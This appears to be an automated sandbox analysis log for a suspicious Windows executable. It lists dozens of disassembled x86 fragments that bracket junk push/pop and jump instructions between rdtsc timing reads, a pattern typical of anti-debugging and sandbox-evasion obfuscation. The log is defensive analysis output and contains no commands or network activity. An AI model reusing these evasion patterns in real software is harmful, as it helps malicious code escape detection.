Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36E068 second address: 36E086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B771h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36E5C7 second address: 36E5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36E80C second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36E9F9 second address: 36E9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36F05E second address: 36F068 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36F987 second address: 36F9A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36F9A2 second address: 36F9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36F9A8 second address: 36F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36F9AC second address: 36F9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371F19 second address: 371F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4688C929E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371F31 second address: 371F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371F56 second address: 371F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371F60 second address: 371F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371D10 second address: 371D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 371D16 second address: 371D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 373578 second address: 37359E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C929E4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F4688C929DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37359E second address: 3735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37578E second address: 375796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3727FB second address: 3727FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 375796 second address: 3757A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3732DF second address: 3732E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3757A4 second address: 3757A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3732E5 second address: 3732EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37AA49 second address: 37AA4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37AA4E second address: 37AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B778h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37AA73 second address: 37AA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37AF93 second address: 37AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4688C1B768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3A74h] 0x0000002a push 00000000h 0x0000002c mov di, cx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F4688C1B776h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37BDEC second address: 37BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F4688C929EAh 0x0000000c pushad 0x0000000d jmp 00007F4688C929DCh 0x00000012 jnc 00007F4688C929D6h 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D38AEh], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4688C929D8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov bx, di 0x00000040 push 00000000h 0x00000042 or edi, 539C45E0h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37B149 second address: 37B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37BE4C second address: 37BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37B14E second address: 37B153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37BF9C second address: 37BFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4688C929D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37D103 second address: 37D10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37DFD9 second address: 37E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4688C929E9h 0x0000000d jg 00007F4688C929D8h 0x00000013 popad 0x00000014 nop 0x00000015 or dword ptr [ebp+122D2828h], edx 0x0000001b mov bh, E6h 0x0000001d push 00000000h 0x0000001f jnc 00007F4688C929DCh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4688C929D8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 movsx edi, si 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pop edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37F02F second address: 37F035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 37F035 second address: 37F04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 38240F second address: 382441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4688C1B76Fh 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F4688C1B766h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 382441 second address: 38246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 383A60 second address: 383A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 384BE6 second address: 384BEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 383C89 second address: 383C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 385CC7 second address: 385D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4688C929E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F4688C929D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 384E1C second address: 384EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F4688C1B768h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F4688C1B768h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c adc bl, FFFFFFE6h 0x0000004f mov eax, dword ptr [ebp+122D0995h] 0x00000055 stc 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4688C1B778h 0x0000005d jmp 00007F4688C1B76Ah 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jng 00007F4688C1B766h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 386CB6 second address: 386CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 388AB0 second address: 388AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4688C1B768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xor ebx, 5F64974Fh 0x00000029 push 00000000h 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12454D8Eh], edi 0x00000036 mov edi, 719258C0h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 389B5D second address: 389B73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f je 00007F4688C929D6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 385E9F second address: 385F40 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c or dword ptr [ebp+12449AABh], ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007F4688C1B775h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F4688C1B768h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov bx, 70B8h 0x00000043 mov eax, dword ptr [ebp+122D06B1h] 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4688C1B768h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push FFFFFFFFh 0x00000065 or dword ptr [ebp+12461125h], ebx 0x0000006b mov edi, dword ptr [ebp+122D3ACCh] 0x00000071 push eax 0x00000072 pushad 0x00000073 push edi 0x00000074 ja 00007F4688C1B766h 0x0000007a pop edi 0x0000007b push eax 0x0000007c push edx 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 389CE0 second address: 389CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 389CE6 second address: 389CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 38C88B second address: 38C895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 389CFE second address: 389D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 38C895 second address: 38C901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3628h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4688C929D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, 1DB538E4h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F4688C929D8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f jo 00007F4688C929E4h 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007F4688C929D6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 38ABFC second address: 38AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32C010 second address: 32C01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32C01D second address: 32C023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32C023 second address: 32C037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3CBCF9 second address: 3CBCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3CB23A second address: 3CB266 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3CB3A3 second address: 3CB3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3CB3A9 second address: 3CB3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3CB716 second address: 3CB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D13DC second address: 3D141D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4688C929FDh 0x0000000b jmp 00007F4688C929DEh 0x00000010 jmp 00007F4688C929E9h 0x00000015 pushad 0x00000016 jng 00007F4688C929D6h 0x0000001c jo 00007F4688C929D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1715 second address: 3D1719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1719 second address: 3D1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1726 second address: 3D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1F93 second address: 3D1FA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C929D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1FA3 second address: 3D1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D1FA7 second address: 3D1FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D2306 second address: 3D230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D230C second address: 3D239C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4688C929E2h 0x0000000f jno 00007F4688C929D6h 0x00000015 jc 00007F4688C929D6h 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 jng 00007F4688C929D6h 0x0000002a jmp 00007F4688C929E2h 0x0000002f popad 0x00000030 js 00007F4688C929E7h 0x00000036 jmp 00007F4688C929DBh 0x0000003b je 00007F4688C929D6h 0x00000041 pushad 0x00000042 jmp 00007F4688C929E9h 0x00000047 jbe 00007F4688C929D6h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007F4688C929D6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D239C second address: 3D23A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4688C1B766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D25D6 second address: 3D25DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D25DC second address: 3D25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D287E second address: 3D2882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D2882 second address: 3D288A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D99F4 second address: 3D9A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4688C929D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
